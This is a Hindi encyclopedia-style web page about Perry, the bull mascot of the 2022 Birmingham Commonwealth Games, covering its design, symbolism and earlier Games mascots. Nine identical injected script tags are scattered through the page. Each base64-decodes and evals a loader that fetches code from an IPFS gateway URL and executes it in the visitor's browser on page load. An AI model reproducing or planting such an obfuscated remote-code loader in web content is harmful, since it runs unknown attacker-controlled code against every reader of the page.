पैरी (शुभंकर)  

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
शुभंकर पैरी, राष्ट्रमंडल खेल 2022

पैरी {अंग्रेज़ी: Perry (mascot)} वर्ष 2022 में सम्पन्न हुए राष्ट्रमंडल खेलों का शुभंकर था। पैरी एक बैल है, जिसका नाम इंग्लैंड के बर्मिंघम शहर के पैरी बार्र इलाके के नाम पर रखा गया था। इसी इलाके में ऐलेक्जेंडर स्टेडियम है, जहाँ 2022 के राष्ट्रमंडल खेलों का आयोजन और समापन किया गया।

  • खास बात ये थी कि पैरी का डिजायन 10 साल की एक बच्ची एमा लू ने तैयार किया था। एमा लू ने पैरी के डिजायन में इसे षट्भुज की आकृति से बनाया। मार्च 2021 में जब पैरी को आधिकारिक रूप से शुभंकर चुना गया, तब एमा ने बताया था कि ये आकृति सबसे मजबूत मानी जाती है और अच्छे से किसी भी आकार को जोड़कर रखती है। इसलिए उन्होंने भी पैरी को बनाने में षटभुज का ही उपयोग किया।
  • बर्मिंघम में सालों से बुलरिंग नामक बाज़ार है जो बुलरिंग नाम के शॉपिंग सेंटर के पास है। इसलिए भी पैरी को एक बौल यानी बुल के रूप में रखा गया।
  • पैरी की आकृति में शामिल षटभुज को सतरंगी बनाते हुए संदेश दिया गया था कि ये कॉमनवेल्थ खेल सभी के लिए हैं।
  • शुभंकर पैरी के गले में एक पदक है जो बर्मिंघम के विशालकाय आभूषण बाज़ार को दर्शाता है।
  • बर्मिंघम में ज्वैलरी क्वार्टर नाम से एक उद्योग केंद्र भी है, जहाँ सैकड़ों गहनों से जुड़ी दुकाने हैं।
  • राष्ट्रमंडल खेल 2022 के शुभंकर पैरी ने खेल किट पहनी है जिसमें नीला, पीला और लाल रंग दिख रहा है। यह बर्मिंघम के आधिकारिक ध्वज के रंग हैं।
  • कॉमनवेल्थ खेलों में शुभंकर रखने की शुरुआत साल 1978 के एडोमॉन्ट खेलों से हुई, जो कनाडा में हुए थे। पहला शुभंकर केयानो एक भालू था। साल 1982 में ब्रिसबेन, ऑस्ट्रेलिया के खेलों में मटिल्डा नाम के कंगारू को शुभंकर बनाया गया था, जो काफी लोकप्रिय हुआ। 2010 में दिल्ली के कॉमनवेल्थ खेलों में शुभंकर शेरा को भी लोगों ने काफी पसंद किया था।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>



<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

"https://amp.bharatdiscovery.org/w/index.php?title=पैरी_(शुभंकर)&oldid=679079" से लिया गया